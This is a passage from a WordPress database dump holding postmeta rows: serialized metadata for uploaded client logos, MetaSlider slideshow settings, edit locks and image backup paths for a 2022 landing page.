3.png\";s:8:\"filesize\";i:4613;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"Musimundo_3-150x37.png\";s:5:\"width\";i:150;s:6:\"height\";i:37;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2974;}s:25:\"meta-slider-resized-86x37\";a:5:{s:4:\"file\";s:21:\"Musimundo_3-86x37.png\";s:5:\"width\";i:86;s:6:\"height\";i:37;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1514;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(199,84,'_edit_last','1'),(200,84,'_thumbnail_id','85'),(201,84,'_edit_lock','1664280887:1'),(202,87,'_wp_attached_file','2022/09/navbar-logo-2.png'),(203,87,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:190;s:6:\"height\";i:56;s:4:\"file\";s:25:\"2022/09/navbar-logo-2.png\";s:8:\"filesize\";i:2140;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"navbar-logo-2-150x56.png\";s:5:\"width\";i:150;s:6:\"height\";i:56;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1633;}s:26:\"meta-slider-resized-130x56\";a:5:{s:4:\"file\";s:24:\"navbar-logo-2-130x56.png\";s:5:\"width\";i:130;s:6:\"height\";i:56;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1398;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(204,86,'_edit_last','1'),(205,86,'_thumbnail_id','87'),(206,86,'_edit_lock','1664280906:1'),(207,89,'_wp_attached_file','2022/09/paktar-logo-2.png'),(208,89,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:178;s:6:\"height\";i:46;s:4:\"file\";s:25:\"2022/09/paktar-logo-2.png\";s:8:\"filesize\";i:9371;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"paktar-logo-2-150x46.png\";s:5:\"width\";i:150;s:6:\"height\";i:46;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6437;}s:26:\"meta-slider-resized-107x46\";a:5:{s:4:\"file\";s:24:\"paktar-logo-2-107x46.png\";s:5:\"width\";i:107;s:6:\"height\";i:46;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4207;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(209,88,'_edit_last','1'),(210,88,'_thumbnail_id','89'),(211,88,'_edit_lock','1664280930:1'),(212,91,'_wp_attached_file','2022/09/portela_logo-2.png'),(213,91,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:196;s:6:\"height\";i:54;s:4:\"file\";s:26:\"2022/09/portela_logo-2.png\";s:8:\"filesize\";i:8949;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"portela_logo-2-150x54.png\";s:5:\"width\";i:150;s:6:\"height\";i:54;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7453;}s:26:\"meta-slider-resized-126x54\";a:5:{s:4:\"file\";s:25:\"portela_logo-2-126x54.png\";s:5:\"width\";i:126;s:6:\"height\";i:54;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6580;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(214,90,'_edit_last','1'),(215,90,'_thumbnail_id','91'),(216,90,'_edit_lock','1664280951:1'),(217,93,'_wp_attached_file','2022/09/pseguros2-1-2.png'),(218,93,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:163;s:6:\"height\";i:50;s:4:\"file\";s:25:\"2022/09/pseguros2-1-2.png\";s:8:\"filesize\";i:5394;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"pseguros2-1-2-150x50.png\";s:5:\"width\";i:150;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4486;}s:26:\"meta-slider-resized-116x50\";a:5:{s:4:\"file\";s:24:\"pseguros2-1-2-116x50.png\";s:5:\"width\";i:116;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3905;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(219,92,'_edit_last','1'),(220,92,'_thumbnail_id','93'),(221,92,'_edit_lock','1664280973:1'),(222,95,'_wp_attached_file','2022/09/san-cristobal-seguros-2.png'),(223,95,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:193;s:6:\"height\";i:39;s:4:\"file\";s:35:\"2022/09/san-cristobal-seguros-2.png\";s:8:\"filesize\";i:5984;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:34:\"san-cristobal-seguros-2-150x39.png\";s:5:\"width\";i:150;s:6:\"height\";i:39;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3760;}s:25:\"meta-slider-resized-91x39\";a:5:{s:4:\"file\";s:33:\"san-cristobal-seguros-2-91x39.png\";s:5:\"width\";i:91;s:6:\"height\";i:39;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2149;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(224,94,'_edit_last','1'),(225,94,'_thumbnail_id','95'),(226,94,'_edit_lock','1664280995:1'),(227,97,'_wp_attached_file','2022/09/sancor-salud-2.png'),(228,97,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:44;s:4:\"file\";s:26:\"2022/09/sancor-salud-2.png\";s:8:\"filesize\";i:15500;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"sancor-salud-2-150x44.png\";s:5:\"width\";i:150;s:6:\"height\";i:44;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8442;}s:26:\"meta-slider-resized-102x44\";a:5:{s:4:\"file\";s:25:\"sancor-salud-2-102x44.png\";s:5:\"width\";i:102;s:6:\"height\";i:44;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5063;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(229,96,'_edit_last','1'),(230,96,'_edit_lock','1664281014:1'),(231,96,'_thumbnail_id','97'),(232,99,'_wp_attached_file','2022/09/total-support-2.png'),(233,99,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:190;s:4:\"file\";s:27:\"2022/09/total-support-2.png\";s:8:\"filesize\";i:11023;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"total-support-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7983;}s:26:\"meta-slider-resized-200x85\";a:5:{s:4:\"file\";s:26:\"total-support-2-200x85.png\";s:5:\"width\";i:200;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9054;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(234,98,'_edit_last','1'),(235,98,'_thumbnail_id','99'),(236,98,'_edit_lock','1664281047:1'),(237,100,'_edit_lock','1664299910:1'),(238,100,'_wp_page_template','page-landing.php'),(239,102,'ml-slider_settings','a:39:{s:5:\"title\";s:35:\"Nueva presentación de diapositivas\";s:4:\"type\";s:10:\"responsive\";s:6:\"random\";s:5:\"false\";s:8:\"cssClass\";s:0:\"\";s:8:\"printCss\";s:4:\"true\";s:7:\"printJs\";s:4:\"true\";s:5:\"width\";s:3:\"700\";s:6:\"height\";s:3:\"300\";s:3:\"spw\";s:1:\"7\";s:3:\"sph\";s:1:\"5\";s:5:\"delay\";s:4:\"3000\";s:6:\"sDelay\";s:2:\"30\";s:7:\"opacity\";s:3:\"0.7\";s:10:\"titleSpeed\";s:3:\"500\";s:6:\"effect\";s:4:\"fade\";s:10:\"navigation\";s:5:\"false\";s:5:\"links\";s:4:\"true\";s:10:\"hoverPause\";s:5:\"false\";s:5:\"theme\";s:4:\"none\";s:9:\"direction\";s:10:\"horizontal\";s:7:\"reverse\";s:5:\"false\";s:14:\"animationSpeed\";s:3:\"600\";s:8:\"prevText\";s:8:\"Anterior\";s:8:\"nextText\";s:9:\"Siguiente\";s:6:\"slices\";s:2:\"15\";s:6:\"center\";s:5:\"false\";s:9:\"smartCrop\";s:4:\"true\";s:12:\"carouselMode\";s:5:\"false\";s:14:\"carouselMargin\";s:1:\"5\";s:16:\"firstSlideFadeIn\";s:5:\"false\";s:6:\"easing\";s:6:\"linear\";s:8:\"autoPlay\";s:4:\"true\";s:11:\"thumb_width\";i:150;s:12:\"thumb_height\";i:100;s:17:\"responsive_thumbs\";s:5:\"false\";s:15:\"thumb_min_width\";i:100;s:9:\"fullWidth\";s:4:\"true\";s:10:\"noConflict\";s:5:\"false\";s:12:\"smoothHeight\";s:5:\"false\";}'),(240,102,'metaslider_slideshow_theme',''),(241,103,'_thumbnail_id','99'),(242,103,'ml-slider_type','image'),(243,103,'ml-slider_inherit_image_title','1'),(244,103,'ml-slider_inherit_image_alt','1'),(245,104,'_thumbnail_id','97'),(246,104,'ml-slider_type','image'),(247,104,'ml-slider_inherit_image_title','1'),(248,104,'ml-slider_inherit_image_alt','1'),(249,105,'_thumbnail_id','95'),(250,105,'ml-slider_type','image'),(251,105,'ml-slider_inherit_image_title','1'),(252,105,'ml-slider_inherit_image_alt','1'),(253,106,'_thumbnail_id','93'),(254,106,'ml-slider_type','image'),(255,106,'ml-slider_inherit_image_title','1'),(256,106,'ml-slider_inherit_image_alt','1'),(257,107,'_thumbnail_id','91'),(258,107,'ml-slider_type','image'),(259,107,'ml-slider_inherit_image_title','1'),(260,107,'ml-slider_inherit_image_alt','1'),(261,108,'_thumbnail_id','89'),(262,108,'ml-slider_type','image'),(263,108,'ml-slider_inherit_image_title','1'),(264,108,'ml-slider_inherit_image_alt','1'),(265,109,'_thumbnail_id','87'),(266,109,'ml-slider_type','image'),(267,109,'ml-slider_inherit_image_title','1'),(268,109,'ml-slider_inherit_image_alt','1'),(269,110,'_thumbnail_id','85'),(270,110,'ml-slider_type','image'),(271,110,'ml-slider_inherit_image_title','1'),(272,110,'ml-slider_inherit_image_alt','1'),(273,111,'_thumbnail_id','83'),(274,111,'ml-slider_type','image'),(275,111,'ml-slider_inherit_image_title','1'),(276,111,'ml-slider_inherit_image_alt','1'),(277,112,'_thumbnail_id','81'),(278,112,'ml-slider_type','image'),(279,112,'ml-slider_inherit_image_title','1'),(280,112,'ml-slider_inherit_image_alt','1'),(281,113,'_thumbnail_id','79'),(282,113,'ml-slider_type','image'),(283,113,'ml-slider_inherit_image_title','1'),(284,113,'ml-slider_inherit_image_alt','1'),(285,114,'_thumbnail_id','77'),(286,114,'ml-slider_type','image'),(287,114,'ml-slider_inherit_image_title','1'),(288,114,'ml-slider_inherit_image_alt','1'),(289,115,'_thumbnail_id','75'),(290,115,'ml-slider_type','image'),(291,115,'ml-slider_inherit_image_title','1'),(292,115,'ml-slider_inherit_image_alt','1'),(293,116,'_thumbnail_id','73'),(294,116,'ml-slider_type','image'),(295,116,'ml-slider_inherit_image_title','1'),(296,116,'ml-slider_inherit_image_alt','1'),(297,117,'_thumbnail_id','71'),(298,117,'ml-slider_type','image'),(299,117,'ml-slider_inherit_image_title','1'),(300,117,'ml-slider_inherit_image_alt','1'),(301,118,'_thumbnail_id','69'),(302,118,'ml-slider_type','image'),(303,118,'ml-slider_inherit_image_title','1'),(304,118,'ml-slider_inherit_image_alt','1'),(305,119,'_thumbnail_id','67'),(306,119,'ml-slider_type','image'),(307,119,'ml-slider_inherit_image_title','1'),(308,119,'ml-slider_inherit_image_alt','1'),(309,120,'_thumbnail_id','65'),(310,120,'ml-slider_type','image'),(311,120,'ml-slider_inherit_image_title','1'),(312,120,'ml-slider_inherit_image_alt','1'),(313,121,'_thumbnail_id','63'),(314,121,'ml-slider_type','image'),(315,121,'ml-slider_inherit_image_title','1'),(316,121,'ml-slider_inherit_image_alt','1'),(317,122,'_thumbnail_id','61'),(318,122,'ml-slider_type','image'),(319,122,'ml-slider_inherit_image_title','1'),(320,122,'ml-slider_inherit_image_alt','1'),(321,123,'_thumbnail_id','59'),(322,123,'ml-slider_type','image'),(323,123,'ml-slider_inherit_image_title','1'),(324,123,'ml-slider_inherit_image_alt','1'),(325,124,'_thumbnail_id','57'),(326,124,'ml-slider_type','image'),(327,124,'ml-slider_inherit_image_title','1'),(328,124,'ml-slider_inherit_image_alt','1'),(329,125,'_thumbnail_id','55'),(330,125,'ml-slider_type','image'),(331,125,'ml-slider_inherit_image_title','1'),(332,125,'ml-slider_inherit_image_alt','1'),(333,126,'_thumbnail_id','53'),(334,126,'ml-slider_type','image'),(335,126,'ml-slider_inherit_image_title','1'),(336,126,'ml-slider_inherit_image_alt','1'),(337,127,'_thumbnail_id','51'),(338,127,'ml-slider_type','image'),(339,127,'ml-slider_inherit_image_title','1'),(340,127,'ml-slider_inherit_image_alt','1'),(341,128,'_thumbnail_id','49'),(342,128,'ml-slider_type','image'),(343,128,'ml-slider_inherit_image_title','1'),(344,128,'ml-slider_inherit_image_alt','1'),(345,129,'_thumbnail_id','47'),(346,129,'ml-slider_type','image'),(347,129,'ml-slider_inherit_image_title','1'),(348,129,'ml-slider_inherit_image_alt','1'),(349,130,'_thumbnail_id','45'),(350,130,'ml-slider_type','image'),(351,130,'ml-slider_inherit_image_title','1'),(352,130,'ml-slider_inherit_image_alt','1'),(353,131,'_thumbnail_id','43'),(354,131,'ml-slider_type','image'),(355,131,'ml-slider_inherit_image_title','1'),(356,131,'ml-slider_inherit_image_alt','1'),(357,132,'_thumbnail_id','41'),(358,132,'ml-slider_type','image'),(359,132,'ml-slider_inherit_image_title','1'),(360,132,'ml-slider_inherit_image_alt','1'),(361,133,'_thumbnail_id','37'),(362,133,'ml-slider_type','image'),(363,133,'ml-slider_inherit_image_title','1'),(364,133,'ml-slider_inherit_image_alt','1'),(365,134,'_thumbnail_id','35'),(366,134,'ml-slider_type','image'),(367,134,'ml-slider_inherit_image_title','1'),(368,134,'ml-slider_inherit_image_alt','1'),(369,135,'_thumbnail_id','33'),(370,135,'ml-slider_type','image'),(371,135,'ml-slider_inherit_image_title','1'),(372,135,'ml-slider_inherit_image_alt','1'),(373,136,'_thumbnail_id','31'),(374,136,'ml-slider_type','image'),(375,136,'ml-slider_inherit_image_title','1'),(376,136,'ml-slider_inherit_image_alt','1'),(377,137,'_thumbnail_id','29'),(378,137,'ml-slider_type','image'),(379,137,'ml-slider_inherit_image_title','1'),(380,137,'ml-slider_inherit_image_alt','1'),(381,138,'_thumbnail_id','27'),(382,138,'ml-slider_type','image'),(383,138,'ml-slider_inherit_image_title','1'),(384,138,'ml-slider_inherit_image_alt','1'),(385,139,'_thumbnail_id','25'),(386,139,'ml-slider_type','image'),(387,139,'ml-slider_inherit_image_title','1'),(388,139,'ml-slider_inherit_image_alt','1'),(389,140,'_thumbnail_id','23'),(390,140,'ml-slider_type','image'),(391,140,'ml-slider_inherit_image_title','1'),(392,140,'ml-slider_inherit_image_alt','1'),(393,141,'_thumbnail_id','21'),(394,141,'ml-slider_type','image'),(395,141,'ml-slider_inherit_image_title','1'),(396,141,'ml-slider_inherit_image_alt','1'),(397,142,'_thumbnail_id','19'),(398,142,'ml-slider_type','image'),(399,142,'ml-slider_inherit_image_title','1'),(400,142,'ml-slider_inherit_image_alt','1'),(401,143,'_thumbnail_id','17'),(402,143,'ml-slider_type','image'),(403,143,'ml-slider_inherit_image_title','1'),(404,143,'ml-slider_inherit_image_alt','1'),(405,144,'_thumbnail_id','15'),(406,144,'ml-slider_type','image'),(407,144,'ml-slider_inherit_image_title','1'),(408,144,'ml-slider_inherit_image_alt','1'),(409,145,'_thumbnail_id','13'),(410,145,'ml-slider_type','image'),(411,145,'ml-slider_inherit_image_title','1'),(412,145,'ml-slider_inherit_image_alt','1'),(413,146,'_thumbnail_id','11'),(414,146,'ml-slider_type','image'),(415,146,'ml-slider_inherit_image_title','1'),(416,146,'ml-slider_inherit_image_alt','1'),(417,147,'_thumbnail_id','9'),(418,147,'ml-slider_type','image'),(419,147,'ml-slider_inherit_image_title','1'),(420,147,'ml-slider_inherit_image_alt','1'),(421,148,'_thumbnail_id','6'),(422,148,'ml-slider_type','image'),(423,148,'ml-slider_inherit_image_title','1'),(424,148,'ml-slider_inherit_image_alt','1'),(425,103,'ml-slider_crop_position','center-center'),(426,103,'ml-slider_caption_source','image-caption'),(427,103,'_wp_attachment_image_alt',''),(428,104,'ml-slider_crop_position','center-center'),(429,104,'ml-slider_caption_source','image-caption'),(430,104,'_wp_attachment_image_alt',''),(431,105,'ml-slider_crop_position','center-center'),(432,105,'ml-slider_caption_source','image-caption'),(433,105,'_wp_attachment_image_alt',''),(434,106,'ml-slider_crop_position','center-center'),(435,106,'ml-slider_caption_source','image-caption'),(436,106,'_wp_attachment_image_alt',''),(437,107,'ml-slider_crop_position','center-center'),(438,107,'ml-slider_caption_source','image-caption'),(439,107,'_wp_attachment_image_alt',''),(440,108,'ml-slider_crop_position','center-center'),(441,108,'ml-slider_caption_source','image-caption'),(442,108,'_wp_attachment_image_alt',''),(443,109,'ml-slider_crop_position','center-center'),(444,109,'ml-slider_caption_source','image-caption'),(445,109,'_wp_attachment_image_alt',''),(446,110,'ml-slider_crop_position','center-center'),(447,110,'ml-slider_caption_source','image-caption'),(448,110,'_wp_attachment_image_alt',''),(449,111,'ml-slider_crop_position','center-center'),(450,111,'ml-slider_caption_source','image-caption'),(451,111,'_wp_attachment_image_alt',''),(452,112,'ml-slider_crop_position','center-center'),(453,112,'ml-slider_caption_source','image-caption'),(454,112,'_wp_attachment_image_alt',''),(455,113,'ml-slider_crop_position','center-center'),(456,113,'ml-slider_caption_source','image-caption'),(457,113,'_wp_attachment_image_alt',''),(458,114,'ml-slider_crop_position','center-center'),(459,114,'ml-slider_caption_source','image-caption'),(460,114,'_wp_attachment_image_alt',''),(461,115,'ml-slider_crop_position','center-center'),(462,115,'ml-slider_caption_source','image-caption'),(463,115,'_wp_attachment_image_alt',''),(464,116,'ml-slider_crop_position','center-center'),(465,116,'ml-slider_caption_source','image-caption'),(466,116,'_wp_attachment_image_alt',''),(467,117,'ml-slider_crop_position','center-center'),(468,117,'ml-slider_caption_source','image-caption'),(469,117,'_wp_attachment_image_alt',''),(470,118,'ml-slider_crop_position','center-center'),(471,118,'ml-slider_caption_source','image-caption'),(472,118,'_wp_attachment_image_alt',''),(473,119,'ml-slider_crop_position','center-center'),(474,119,'ml-slider_caption_source','image-caption'),(475,119,'_wp_attachment_image_alt',''),(476,120,'ml-slider_crop_position','center-center'),(477,120,'ml-slider_caption_source','image-caption'),(478,120,'_wp_attachment_image_alt',''),(479,121,'ml-slider_crop_position','center-center'),(480,121,'ml-slider_caption_source','image-caption'),(481,121,'_wp_attachment_image_alt',''),(482,122,'ml-slider_crop_position','center-center'),(483,122,'ml-slider_caption_source','image-caption'),(484,122,'_wp_attachment_image_alt',''),(485,123,'ml-slider_crop_position','center-center'),(486,123,'ml-slider_caption_source','image-caption'),(487,123,'_wp_attachment_image_alt',''),(488,124,'ml-slider_crop_position','center-center'),(489,124,'ml-slider_caption_source','image-caption'),(490,124,'_wp_attachment_image_alt',''),(491,125,'ml-slider_crop_position','center-center'),(492,125,'ml-slider_caption_source','image-caption'),(493,125,'_wp_attachment_image_alt',''),(494,126,'ml-slider_crop_position','center-center'),(495,126,'ml-slider_caption_source','image-caption'),(496,126,'_wp_attachment_image_alt',''),(497,127,'ml-slider_crop_position','center-center'),(498,127,'ml-slider_caption_source','image-caption'),(499,127,'_wp_attachment_image_alt',''),(500,128,'ml-slider_crop_position','center-center'),(501,128,'ml-slider_caption_source','image-caption'),(502,128,'_wp_attachment_image_alt',''),(503,129,'ml-slider_crop_position','center-center'),(504,129,'ml-slider_caption_source','image-caption'),(505,129,'_wp_attachment_image_alt',''),(506,130,'ml-slider_crop_position','center-center'),(507,130,'ml-slider_caption_source','image-caption'),(508,130,'_wp_attachment_image_alt',''),(509,131,'ml-slider_crop_position','center-center'),(510,131,'ml-slider_caption_source','image-caption'),(511,131,'_wp_attachment_image_alt',''),(512,132,'ml-slider_crop_position','center-center'),(513,132,'ml-slider_caption_source','image-caption'),(514,132,'_wp_attachment_image_alt',''),(515,133,'ml-slider_crop_position','center-center'),(516,133,'ml-slider_caption_source','image-caption'),(517,133,'_wp_attachment_image_alt',''),(518,134,'ml-slider_crop_position','center-center'),(519,134,'ml-slider_caption_source','image-caption'),(520,134,'_wp_attachment_image_alt',''),(521,135,'ml-slider_crop_position','center-center'),(522,135,'ml-slider_caption_source','image-caption'),(523,135,'_wp_attachment_image_alt',''),(524,136,'ml-slider_crop_position','center-center'),(525,136,'ml-slider_caption_source','image-caption'),(526,136,'_wp_attachment_image_alt',''),(527,137,'ml-slider_crop_position','center-center'),(528,137,'ml-slider_caption_source','image-caption'),(529,137,'_wp_attachment_image_alt',''),(530,138,'ml-slider_crop_position','center-center'),(531,138,'ml-slider_caption_source','image-caption'),(532,138,'_wp_attachment_image_alt',''),(533,139,'ml-slider_crop_position','center-center'),(534,139,'ml-slider_caption_source','image-caption'),(535,139,'_wp_attachment_image_alt',''),(536,140,'ml-slider_crop_position','center-center'),(537,140,'ml-slider_caption_source','image-caption'),(538,140,'_wp_attachment_image_alt',''),(539,141,'ml-slider_crop_position','center-center'),(540,141,'ml-slider_caption_source','image-caption'),(541,141,'_wp_attachment_image_alt',''),(542,142,'ml-slider_crop_position','center-center'),(543,142,'ml-slider_caption_source','image-caption'),(544,142,'_wp_attachment_image_alt',''),(545,143,'ml-slider_crop_position','center-center'),(546,143,'ml-slider_caption_source','image-caption'),(547,143,'_wp_attachment_image_alt',''),(548,144,'ml-slider_crop_position','center-center'),(549,144,'ml-slider_caption_source','image-caption'),(550,144,'_wp_attachment_image_alt',''),(551,145,'ml-slider_crop_position','center-center'),(552,145,'ml-slider_caption_source','image-caption'),(553,145,'_wp_attachment_image_alt',''),(554,146,'ml-slider_crop_position','center-center'),(555,146,'ml-slider_caption_source','image-caption'),(556,146,'_wp_attachment_image_alt',''),(557,147,'ml-slider_crop_position','center-center'),(558,147,'ml-slider_caption_source','image-caption'),(559,147,'_wp_attachment_image_alt',''),(560,148,'ml-slider_crop_position','center-center'),(561,148,'ml-slider_caption_source','image-caption'),(562,148,'_wp_attachment_image_alt',''),(563,99,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-200x85\";a:6:{s:4:\"path\";s:98:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/total-support-2-200x85.png\";s:4:\"file\";s:26:\"total-support-2-200x85.png\";s:5:\"width\";i:200;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9054;}}'),(564,97,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-102x44\";a:6:{s:4:\"path\";s:97:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/sancor-salud-2-102x44.png\";s:4:\"file\";s:25:\"sancor-salud-2-102x44.png\";s:5:\"width\";i:102;s:6:\"height\";i:44;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5063;}}'),(565,95,'_wp_attachment_backup_sizes','a:1:{s:13:\"resized-91x39\";a:6:{s:4:\"path\";s:105:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/san-cristobal-seguros-2-91x39.png\";s:4:\"file\";s:33:\"san-cristobal-seguros-2-91x39.png\";s:5:\"width\";i:91;s:6:\"height\";i:39;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2149;}}'),(566,93,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-116x50\";a:6:{s:4:\"path\";s:96:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/pseguros2-1-2-116x50.png\";s:4:\"file\";s:24:\"pseguros2-1-2-116x50.png\";s:5:\"width\";i:116;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3905;}}'),(567,91,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-126x54\";a:6:{s:4:\"path\";s:97:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/portela_logo-2-126x54.png\";s:4:\"file\";s:25:\"portela_logo-2-126x54.png\";s:5:\"width\";i:126;s:6:\"height\";i:54;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6580;}}'),(568,89,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-107x46\";a:6:{s:4:\"path\";s:96:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/paktar-logo-2-107x46.png\";s:4:\"file\";s:24:\"paktar-logo-2-107x46.png\";s:5:\"width\";i:107;s:6:\"height\";i:46;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4207;}}'),(569,87,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-130x56\";a:6:{s:4:\"path\";s:96:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/navbar-logo-2-130x56.png\";s:4:\"file\";s:24:\"navbar-logo-2-130x56.png\";s:5:\"width\";i:130;s:6:\"height\";i:56;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1398;}}'),(570,85,'_wp_attachment_backup_sizes','a:1:{s:13:\"resized-86x37\";a:6:{s:4:\"path\";s:93:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/Musimundo_3-86x37.png\";s:4:\"file\";s:21:\"Musimundo_3-86x37.png\";s:5:\"width\";i:86;s:6:\"height\";i:37;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1514;}}'),(571,83,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-152x65\";a:6:{s:4:\"path\";s:102:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/Mostaza_2022_logo-2-152x65.png\";s:4:\"file\";s:30:\"Mostaza_2022_logo-2-152x65.png\";s:5:\"width\";i:152;s:6:\